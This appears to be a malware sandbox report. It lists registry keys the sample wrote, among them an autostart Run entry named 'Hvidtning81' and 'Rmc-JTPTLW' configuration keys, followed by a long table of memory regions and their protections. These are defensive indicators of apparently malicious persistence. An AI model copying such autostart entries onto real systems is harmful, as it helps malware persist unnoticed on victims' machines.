HKEY_CURRENT_USER\Environment
|
Greenlets
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-JTPTLW
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-JTPTLW
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-JTPTLW
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Hvidtning81
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2AE000
|
stack
|
page read and write
|
|
|
|
62AE000
|
heap
|
page read and write
|
|
|
|
62D4000
|
heap
|
page read and write
|
|
|
|
62D4000
|
heap
|
page read and write
|
|
|
|
62D6000
|
heap
|
page read and write
|
|
|
|
267C01B2000
|
trusted library allocation
|
page read and write
|
|
|
|
90CD000
|
direct allocation
|
page execute and read and write
|
|
|
|
59FA000
|
trusted library allocation
|
page read and write
|
|
|
|
87C0000
|
direct allocation
|
page execute and read and write
|
|
|
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
468C000
|
heap
|
page read and write
|
||
|
4670000
|
heap
|
page read and write
|
||
|
6EC0000
|
direct allocation
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
2A73000
|
stack
|
page read and write
|
||
|
2287C000
|
unclassified section
|
page execute and read and write
|
||
|
4693000
|
heap
|
page read and write
|
||
|
267B0009000
|
heap
|
page read and write
|
||
|
85F3000
|
heap
|
page read and write
|
||
|
73DD000
|
heap
|
page read and write
|
||
|
464F000
|
unkown
|
page read and write
|
||
|
4686000
|
heap
|
page read and write
|
||
|
21380000
|
direct allocation
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
6EB0000
|
heap
|
page execute and read and write
|
||
|
82E0000
|
trusted library allocation
|
page read and write
|
||
|
4FB0000
|
trusted library allocation
|
page read and write
|
||
|
2230B000
|
heap
|
page read and write
|
||
|
87A0000
|
trusted library allocation
|
page read and write
|
||
|
220D7000
|
heap
|
page read and write
|
||
|
4670000
|
heap
|
page read and write
|
||
|
2F70000
|
trusted library allocation
|
page read and write
|
||
|
D3B81FB000
|
stack
|
page read and write
|
||
|
2F39000
|
trusted library allocation
|
page read and write
|
||
|
2F40000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
D3B7D7C000
|
stack
|
page read and write
|
||
|
2F3A000
|
heap
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
21F50000
|
direct allocation
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
6334000
|
heap
|
page read and write
|
||
|
340000
|
heap
|
page read and write
|
||
|
7320000
|
heap
|
page read and write
|
||
|
82BC000
|
stack
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
267C81D0000
|
heap
|
page execute and read and write
|
||
|
21EEF000
|
stack
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
267C838F000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page readonly
|
||
|
267AE06C000
|
heap
|
page read and write
|
||
|
4686000
|
heap
|
page read and write
|
||
|
21B70000
|
heap
|
page read and write
|
||
|
765D000
|
stack
|
page read and write
|
||
|
4677000
|
heap
|
page read and write
|
||
|
21AC0000
|
direct allocation
|
page read and write
|
||
|
2AF0000
|
heap
|
page readonly
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
4890000
|
trusted library allocation
|
page read and write
|
||
|
82D0000
|
heap
|
page read and write
|
||
|
632E000
|
heap
|
page read and write
|
||
|
267AE190000
|
heap
|
page read and write
|
||
|
2175D000
|
stack
|
page read and write
|
||
|
2F3A000
|
heap
|
page read and write
|
||
|
22101000
|
heap
|
page read and write
|
||
|
267ADFC0000
|
heap
|
page read and write
|
||
|
46F0000
|
heap
|
page read and write
|
||
|
4683000
|
heap
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
4678000
|
heap
|
page read and write
|
||
|
267C82F4000
|
heap
|
page read and write
|
||
|
D3B8D4B000
|
stack
|
page read and write
|
||
|
8790000
|
trusted library allocation
|
page read and write
|
||
|
2F39000
|
heap
|
page read and write
|
||
|
468C000
|
heap
|
page read and write
|
||
|
761E000
|
stack
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
7DF41D7E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22094000
|
heap
|
page read and write
|
||
|
4680000
|
heap
|
page read and write
|
||
|
22820000
|
unclassified section
|
page execute and read and write
|
||
|
267C8200000
|
heap
|
page read and write
|
||
|
4681000
|
heap
|
page read and write
|
||
|
2DAE000
|
stack
|
page read and write
|
||
|
4670000
|
heap
|
page read and write
|
||
|
7FFD9B7B7000
|
trusted library allocation
|
page read and write
|
||
|
2A57000
|
stack
|
page read and write
|
||
|
2FAE000
|
stack
|
page read and write
|
||
|
7FFD9B5D4000
|
trusted library allocation
|
page read and write
|
||
|
21F3B000
|
unclassified section
|
page execute and read and write
|
||
|
467D000
|
heap
|
page read and write
|
||
|
71B8000
|
heap
|
page read and write
|
||
|
7355000
|
heap
|
page read and write
|
||
|
2F20000
|
trusted library allocation
|
page read and write
|
||
|
267B175B000
|
trusted library allocation
|
page read and write
|
||
|
6D4E000
|
stack
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
4DB8000
|
heap
|
page read and write
|
||
|
2FF8000
|
trusted library allocation
|
page read and write
|
||
|
2AD5000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
468C000
|
heap
|
page read and write
|
||
|
267C82E0000
|
heap
|
page read and write
|
||
|
87D0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
D3B7C7E000
|
stack
|
page read and write
|
||
|
6E5B000
|
stack
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
26E000
|
stack
|
page read and write
|
||
|
7F190000
|
trusted library allocation
|
page execute and read and write
|
||
|
267B1F02000
|
trusted library allocation
|
page read and write
|
||
|
4681000
|
heap
|
page read and write
|
||
|
267AE076000
|
heap
|
page read and write
|
||
|
7FFD9B78A000
|
trusted library allocation
|
page read and write
|
||
|
4686000
|
heap
|
page read and write
|
||
|
2D48000
|
heap
|
page read and write
|
||
|
4DB4000
|
heap
|
page read and write
|
||
|
4681000
|
heap
|
page read and write
|
||
|
4988000
|
heap
|
page read and write
|
||
|
4686000
|
heap
|
page read and write
|
||
|
D3B7B7E000
|
stack
|
page read and write
|
||
|
D3B807E000
|
stack
|
page read and write
|
||
|
2C34000
|
heap
|
page read and write
|
||
|
4F7D000
|
trusted library allocation
|
page read and write
|
||
|
2F55000
|
trusted library allocation
|
page execute and read and write
|
||
|
22078000
|
heap
|
page read and write
|
||
|
2CC0000
|
heap
|
page read and write
|
||
|
858E000
|
heap
|
page read and write
|
||
|
2DFA000
|
stack
|
page read and write
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
267B1F0F000
|
trusted library allocation
|
page read and write
|
||
|
4670000
|
heap
|
page read and write
|
||
|
852D000
|
stack
|
page read and write
|
||
|
21F51000
|
direct allocation
|
page execute and read and write
|
||
|
21290000
|
direct allocation
|
page read and write
|
||
|
4706000
|
heap
|
page read and write
|
||
|
267C8170000
|
heap
|
page execute and read and write
|
||
|
6D0E000
|
stack
|
page read and write
|
||
|
4A5F000
|
stack
|
page read and write
|
||
|
8800000
|
direct allocation
|
page read and write
|
||
|
267C8393000
|
heap
|
page read and write
|
||
|
2A6F000
|
stack
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
267B1F13000
|
trusted library allocation
|
page read and write
|
||
|
21C8E000
|
stack
|
page read and write
|
||
|
267C81E0000
|
heap
|
page read and write
|
||
|
2E5C000
|
heap
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
2179C000
|
stack
|
page read and write
|
||
|
46F7000
|
heap
|
page read and write
|
||
|
76F0000
|
trusted library allocation
|
page read and write
|
||
|
D3B77CE000
|
stack
|
page read and write
|
||
|
46E8000
|
heap
|
page read and write
|
||
|
7440000
|
trusted library allocation
|
page read and write
|
||
|
267B20F3000
|
trusted library allocation
|
page read and write
|
||
|
212E0000
|
direct allocation
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page execute and read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
87E0000
|
direct allocation
|
page read and write
|
||
|
59B9000
|
trusted library allocation
|
page read and write
|
||
|
267AFA60000
|
trusted library allocation
|
page read and write
|
||
|
4683000
|
heap
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
D3B817E000
|
stack
|
page read and write
|
||
|
469B000
|
heap
|
page read and write
|
||
|
D3B7F79000
|
stack
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
8580000
|
heap
|
page read and write
|
||
|
21CCF000
|
stack
|
page read and write
|
||
|
7680000
|
trusted library allocation
|
page read and write
|
||
|
2B8A000
|
heap
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
2F6F000
|
unkown
|
page read and write
|
||
|
2F5000
|
heap
|
page read and write
|
||
|
21330000
|
direct allocation
|
page read and write
|
||
|
267B0D5B000
|
trusted library allocation
|
page read and write
|
||
|
4689000
|
heap
|
page read and write
|
||
|
2AD0000
|
heap
|
page read and write
|
||
|
2DBC000
|
stack
|
page read and write
|
||
|
8230000
|
trusted library allocation
|
page read and write
|
||
|
487E000
|
stack
|
page read and write
|
||
|
22084000
|
heap
|
page read and write
|
||
|
21300000
|
direct allocation
|
page read and write
|
||
|
632E000
|
heap
|
page read and write
|
||
|
4DB9000
|
heap
|
page read and write
|
||
|
6EB5000
|
heap
|
page execute and read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
||
|
30B3000
|
heap
|
page read and write
|
||
|
4DB1000
|
heap
|
page read and write
|
||
|
4689000
|
heap
|
page read and write
|
||
|
468C000
|
heap
|
page read and write
|
||
|
267AE074000
|
heap
|
page read and write
|
||
|
21280000
|
direct allocation
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
7FFD9B5E0000
|
trusted library allocation
|
page read and write
|
||
|
4DB1000
|
heap
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2945000
|
stack
|
page read and write
|
||
|
267B0902000
|
trusted library allocation
|
page read and write
|
||
|
2EA6000
|
heap
|
page read and write
|
||
|
267B200C000
|
trusted library allocation
|
page read and write
|
||
|
21DEF000
|
stack
|
page read and write
|
||
|
75DE000
|
stack
|
page read and write
|
||
|
21320000
|
direct allocation
|
page read and write
|
||
|
8455000
|
trusted library allocation
|
page read and write
|
||
|
85B5000
|
heap
|
page read and write
|
||
|
7FFD9B690000
|
trusted library allocation
|
page execute and read and write
|
||
|
633E000
|
heap
|
page read and write
|
||
|
29CD000
|
stack
|
page read and write
|
||
|
6FBE000
|
stack
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
21340000
|
direct allocation
|
page read and write
|
||
|
22079000
|
heap
|
page read and write
|
||
|
7FFD9B6F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
227FD000
|
unclassified section
|
page execute and read and write
|
||
|
6F7A000
|
stack
|
page read and write
|
||
|
36BE000
|
heap
|
page read and write
|
||
|
4680000
|
heap
|
page read and write
|
||
|
4698000
|
heap
|
page read and write
|
||
|
46B3000
|
heap
|
page read and write
|
||
|
624A000
|
heap
|
page read and write
|
||
|
46AA000
|
heap
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
22179000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
2A8F000
|
stack
|
page read and write
|
||
|
D3B7CFF000
|
stack
|
page read and write
|
||
|
4671000
|
heap
|
page read and write
|
||
|
22890000
|
heap
|
page read and write
|
||
|
21B2E000
|
stack
|
page read and write
|
||
|
7FFD9B5D2000
|
trusted library allocation
|
page read and write
|
||
|
4B81000
|
heap
|
page read and write
|
||
|
267AFA50000
|
heap
|
page readonly
|
||
|
267C841A000
|
heap
|
page read and write
|
||
|
2EDB000
|
heap
|
page read and write
|
||
|
4DB1000
|
heap
|
page read and write
|
||
|
267B05D6000
|
trusted library allocation
|
page read and write
|
||
|
4CD8000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
4680000
|
heap
|
page read and write
|
||
|
223A1000
|
heap
|
page read and write
|
||
|
4684000
|
heap
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
2F39000
|
heap
|
page read and write
|
||
|
267C0161000
|
trusted library allocation
|
page read and write
|
||
|
81EE000
|
stack
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
49EA000
|
trusted library allocation
|
page read and write
|
||
|
267ADF80000
|
heap
|
page read and write
|
||
|
21DAE000
|
stack
|
page read and write
|
||
|
2D0E000
|
stack
|
page read and write
|
||
|
4B81000
|
heap
|
page read and write
|
||
|
4684000
|
heap
|
page read and write
|
||
|
7FFD9B68C000
|
trusted library allocation
|
page execute and read and write
|
||
|
4682000
|
heap
|
page read and write
|
||
|
4685000
|
heap
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
2F4A000
|
trusted library allocation
|
page execute and read and write
|
||
|
469B000
|
heap
|
page read and write
|
||
|
631E000
|
heap
|
page read and write
|
||
|
ACD000
|
stack
|
page read and write
|
||
|
283D000
|
stack
|
page read and write
|
||
|
7180000
|
heap
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
6334000
|
heap
|
page read and write
|
||
|
22400000
|
heap
|
page read and write
|
||
|
267B01CE000
|
trusted library allocation
|
page read and write
|
||
|
4683000
|
heap
|
page read and write
|
||
|
267AE067000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
46F9000
|
heap
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
7670000
|
trusted library allocation
|
page execute and read and write
|
||
|
30BC000
|
heap
|
page read and write
|
||
|
2F52000
|
trusted library allocation
|
page read and write
|
||
|
4677000
|
heap
|
page read and write
|
||
|
D3B8BCE000
|
stack
|
page read and write
|
||
|
7FFD9B5D0000
|
trusted library allocation
|
page read and write
|
||
|
4677000
|
heap
|
page read and write
|
||
|
29C0000
|
heap
|
page readonly
|
||
|
D3B7705000
|
stack
|
page read and write
|
||
|
2D0E000
|
unkown
|
page read and write
|
||
|
2AD5000
|
heap
|
page read and write
|
||
|
467E000
|
heap
|
page read and write
|
||
|
4689000
|
heap
|
page read and write
|
||
|
4DAF000
|
stack
|
page read and write
|
||
|
628E000
|
heap
|
page read and write
|
||
|
7345000
|
heap
|
page read and write
|
||
|
267C82EC000
|
heap
|
page read and write
|
||
|
2AE0000
|
heap
|
page read and write
|
||
|
36BD000
|
heap
|
page read and write
|
||
|
220B1000
|
heap
|
page read and write
|
||
|
2AD5000
|
heap
|
page read and write
|
||
|
85AA000
|
heap
|
page read and write
|
||
|
4B81000
|
heap
|
page read and write
|
||
|
717F000
|
stack
|
page read and write
|
||
|
7660000
|
trusted library allocation
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
267B001D000
|
heap
|
page read and write
|
||
|
46A8000
|
heap
|
page read and write
|
||
|
7690000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5EB000
|
trusted library allocation
|
page read and write
|
||
|
2F30000
|
trusted library allocation
|
page read and write
|
||
|
4689000
|
heap
|
page read and write
|
||
|
7385000
|
heap
|
page read and write
|
||
|
6FFD000
|
stack
|
page read and write
|
||
|
7FFD9B781000
|
trusted library allocation
|
page read and write
|
||
|
7471000
|
heap
|
page read and write
|
||
|
267B00A8000
|
heap
|
page read and write
|
||
|
6334000
|
heap
|
page read and write
|
||
|
267C8439000
|
heap
|
page read and write
|
||
|
267C82E8000
|
heap
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page execute and read and write
|
||
|
47FF000
|
stack
|
page read and write
|
||
|
267C81D7000
|
heap
|
page execute and read and write
|
||
|
2C34000
|
heap
|
page read and write
|
||
|
D3B7FFE000
|
stack
|
page read and write
|
||
|
267AFE5E000
|
heap
|
page read and write
|
||
|
2E55000
|
heap
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
4AE7000
|
trusted library allocation
|
page read and write
|
||
|
21AE0000
|
direct allocation
|
page read and write
|
||
|
2EBB000
|
heap
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
212C0000
|
direct allocation
|
page read and write
|
||
|
22876000
|
unclassified section
|
page execute and read and write
|
||
|
267B1F24000
|
trusted library allocation
|
page read and write
|
||
|
469E000
|
heap
|
page read and write
|
||
|
267B05F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
22001000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
2C1B000
|
heap
|
page read and write
|
||
|
7FFD9B680000
|
trusted library allocation
|
page read and write
|
||
|
2194D000
|
stack
|
page read and write
|
||
|
2BAA000
|
heap
|
page read and write
|
||
|
21C50000
|
remote allocation
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5111000
|
heap
|
page read and write
|
||
|
D3B8CCD000
|
stack
|
page read and write
|
||
|
4DB0000
|
trusted library allocation
|
page read and write
|
||
|
4681000
|
heap
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
2F3A000
|
heap
|
page read and write
|
||
|
33CA000
|
heap
|
page read and write
|
||
|
221F3000
|
heap
|
page read and write
|
||
|
713E000
|
stack
|
page read and write
|
||
|
7FFD9B5DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
46DB000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
8127000
|
stack
|
page read and write
|
||
|
267B0078000
|
heap
|
page read and write
|
||
|
212F0000
|
direct allocation
|
page read and write
|
||
|
85C9000
|
heap
|
page read and write
|
||
|
2F50000
|
trusted library allocation
|
page read and write
|
||
|
492E000
|
stack
|
page read and write
|
||
|
30B0000
|
heap
|
page read and write
|
||
|
36BD000
|
heap
|
page read and write
|
||
|
4685000
|
heap
|
page read and write
|
||
|
AC8000
|
stack
|
page read and write
|
||
|
36B0000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
22078000
|
heap
|
page read and write
|
||
|
22094000
|
heap
|
page read and write
|
||
|
9ACD000
|
direct allocation
|
page execute and read and write
|
||
|
267B05EC000
|
trusted library allocation
|
page read and write
|
||
|
301C000
|
heap
|
page read and write
|
||
|
8F80000
|
direct allocation
|
page execute and read and write
|
||
|
719C000
|
heap
|
page read and write
|
||
|
4677000
|
heap
|
page read and write
|
||
|
4688000
|
heap
|
page read and write
|
||
|
5110000
|
heap
|
page read and write
|
||
|
267AF965000
|
heap
|
page read and write
|
||
|
267C8425000
|
heap
|
page read and write
|
||
|
267AFA40000
|
trusted library allocation
|
page read and write
|
||
|
530F000
|
stack
|
page read and write
|
||
|
21BCE000
|
stack
|
page read and write
|
||
|
267C043B000
|
trusted library allocation
|
page read and write
|
||
|
267B1EF3000
|
trusted library allocation
|
page read and write
|
||
|
703D000
|
stack
|
page read and write
|
||
|
4F75000
|
trusted library allocation
|
page read and write
|
||
|
82C0000
|
trusted library allocation
|
page read and write
|
||
|
267C8370000
|
heap
|
page read and write
|
||
|
62C3000
|
heap
|
page read and write
|
||
|
2AD8000
|
heap
|
page read and write
|
||
|
4FB0000
|
trusted library allocation
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
7FFD9B686000
|
trusted library allocation
|
page read and write
|
||
|
2B6E000
|
unkown
|
page read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
2F2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
29AE000
|
stack
|
page read and write
|
||
|
267ADFD6000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page readonly
|
||
|
4683000
|
heap
|
page read and write
|
||
|
2EB2000
|
heap
|
page read and write
|
||
|
21370000
|
direct allocation
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
33ED000
|
heap
|
page read and write
|
||
|
2D90000
|
heap
|
page read and write
|
||
|
4686000
|
heap
|
page read and write
|
||
|
2DF0000
|
trusted library section
|
page read and write
|
||
|
8310000
|
trusted library allocation
|
page read and write
|
||
|
267ADF70000
|
heap
|
page read and write
|
||
|
22001000
|
heap
|
page read and write
|
||
|
4684000
|
heap
|
page read and write
|
||
|
21AB0000
|
direct allocation
|
page read and write
|
||
|
8200000
|
heap
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
4671000
|
heap
|
page read and write
|
||
|
4DB9000
|
heap
|
page read and write
|
||
|
43AD000
|
remote allocation
|
page execute and read and write
|
||
|
22085000
|
heap
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
85C5000
|
heap
|
page read and write
|
||
|
2A3C000
|
stack
|
page read and write
|
||
|
D3B8DCB000
|
stack
|
page read and write
|
||
|
267AFFC0000
|
heap
|
page read and write
|
||
|
21C50000
|
remote allocation
|
page read and write
|
||
|
6240000
|
heap
|
page read and write
|
||
|
212A0000
|
direct allocation
|
page read and write
|
||
|
2E00000
|
trusted library section
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
3140000
|
heap
|
page readonly
|
||
|
7FFD9B6B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D7E000
|
unkown
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
267AE0B1000
|
heap
|
page read and write
|
||
|
8810000
|
direct allocation
|
page read and write
|
||
|
D3B7EF9000
|
stack
|
page read and write
|
||
|
35BF000
|
unkown
|
page read and write
|
||
|
267C0150000
|
trusted library allocation
|
page read and write
|
||
|
267ADFA5000
|
heap
|
page read and write
|
||
|
4680000
|
heap
|
page read and write
|
||
|
4686000
|
heap
|
page read and write
|
||
|
72FE000
|
stack
|
page read and write
|
||
|
2DCE000
|
stack
|
page read and write
|
||
|
4693000
|
heap
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
D3B7A7E000
|
stack
|
page read and write
|
||
|
827E000
|
stack
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
8850000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B7A000
|
heap
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
267C8336000
|
heap
|
page read and write
|
||
|
6E1D000
|
stack
|
page read and write
|
||
|
87B0000
|
trusted library allocation
|
page read and write
|
||
|
6ED0000
|
direct allocation
|
page read and write
|
||
|
4689000
|
heap
|
page read and write
|
||
|
6E80000
|
direct allocation
|
page read and write
|
||
|
2F23000
|
trusted library allocation
|
page execute and read and write
|
||
|
5111000
|
heap
|
page read and write
|
||
|
D3B8C4E000
|
stack
|
page read and write
|
||
|
21E6F000
|
stack
|
page read and write
|
||
|
469B000
|
heap
|
page read and write
|
||
|
30BF000
|
stack
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
8130000
|
trusted library allocation
|
page read and write
|
||
|
2F3A000
|
heap
|
page read and write
|
||
|
267AE045000
|
heap
|
page read and write
|
||
|
46F7000
|
heap
|
page read and write
|
||
|
23F0000
|
direct allocation
|
page read and write
|
||
|
267C0141000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
36BE000
|
heap
|
page read and write
|
||
|
302F000
|
unkown
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
4F77000
|
trusted library allocation
|
page read and write
|
||
|
267B004F000
|
heap
|
page read and write
|
||
|
4FB0000
|
trusted library allocation
|
page read and write
|
||
|
468C000
|
heap
|
page read and write
|
||
|
4671000
|
heap
|
page read and write
|
||
|
2C10000
|
heap
|
page read and write
|
||
|
468C000
|
heap
|
page read and write
|
||
|
36B3000
|
heap
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
8277000
|
trusted library allocation
|
page read and write
|
||
|
2F3A000
|
heap
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
39AD000
|
remote allocation
|
page execute and read and write
|
||
|
632E000
|
heap
|
page read and write
|
||
|
267ADFA0000
|
heap
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
290C000
|
stack
|
page read and write
|
||
|
267B1A45000
|
trusted library allocation
|
page read and write
|
||
|
8300000
|
trusted library allocation
|
page read and write
|
||
|
A8C000
|
stack
|
page read and write
|
||
|
633D000
|
heap
|
page read and write
|
||
|
4684000
|
heap
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
4706000
|
heap
|
page read and write
|
||
|
4670000
|
heap
|
page read and write
|
||
|
30BC000
|
heap
|
page read and write
|
||
|
4AA0000
|
trusted library allocation
|
page read and write
|
||
|
D3B7E76000
|
stack
|
page read and write
|
||
|
4FB0000
|
trusted library allocation
|
page read and write
|
||
|
4689000
|
heap
|
page read and write
|
||
|
4698000
|
heap
|
page read and write
|
||
|
D3B778E000
|
stack
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
6D8E000
|
stack
|
page read and write
|
||
|
4684000
|
heap
|
page read and write
|
||
|
267C839C000
|
heap
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
223A0000
|
heap
|
page read and write
|
||
|
4697000
|
heap
|
page read and write
|
||
|
2F37000
|
heap
|
page read and write
|
||
|
85A0000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
267AF960000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
4687000
|
heap
|
page read and write
|
||
|
2E10000
|
trusted library allocation
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
73E9000
|
heap
|
page read and write
|
||
|
469A000
|
heap
|
page read and write
|
||
|
2AD5000
|
heap
|
page read and write
|
||
|
7FFD9B7B2000
|
trusted library allocation
|
page read and write
|
||
|
2A4E000
|
stack
|
page read and write
|
||
|
2F3A000
|
heap
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
30BD000
|
heap
|
page read and write
|
||
|
632E000
|
heap
|
page read and write
|
||
|
4680000
|
heap
|
page read and write
|
||
|
2A00000
|
heap
|
page read and write
|
||
|
22085000
|
heap
|
page read and write
|
||
|
267AE0B6000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
217A0000
|
heap
|
page read and write
|
||
|
4DB9000
|
heap
|
page read and write
|
||
|
4685000
|
heap
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
267AFA90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
|
267B0957000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
21310000
|
direct allocation
|
page read and write
|
||
|
22101000
|
heap
|
page read and write
|
||
|
4697000
|
heap
|
page read and write
|
||
|
4DB1000
|
heap
|
page read and write
|
||
|
632E000
|
heap
|
page read and write
|
||
|
849C000
|
stack
|
page read and write
|
||
|
4DB1000
|
heap
|
page read and write
|
||
|
21B6F000
|
stack
|
page read and write
|
||
|
3860000
|
remote allocation
|
page execute and read and write
|
||
|
4706000
|
heap
|
page read and write
|
||
|
631E000
|
heap
|
page read and write
|
||
|
267B004D000
|
heap
|
page read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
6273000
|
heap
|
page read and write
|
||
|
6EE0000
|
direct allocation
|
page read and write
|
||
|
4650000
|
heap
|
page read and write
|
||
|
64D0000
|
heap
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
46F9000
|
heap
|
page read and write
|
||
|
21360000
|
direct allocation
|
page read and write
|
||
|
467F000
|
heap
|
page read and write
|
||
|
4DB8000
|
heap
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
2890000
|
heap
|
page read and write
|
||
|
707B000
|
stack
|
page read and write
|
||
|
21E2C000
|
stack
|
page read and write
|
||
|
82F0000
|
trusted library allocation
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
4A99000
|
heap
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
7430000
|
heap
|
page execute and read and write
|
||
|
227F9000
|
unclassified section
|
page execute and read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
84DC000
|
stack
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
8780000
|
trusted library allocation
|
page read and write
|
||
|
87F0000
|
direct allocation
|
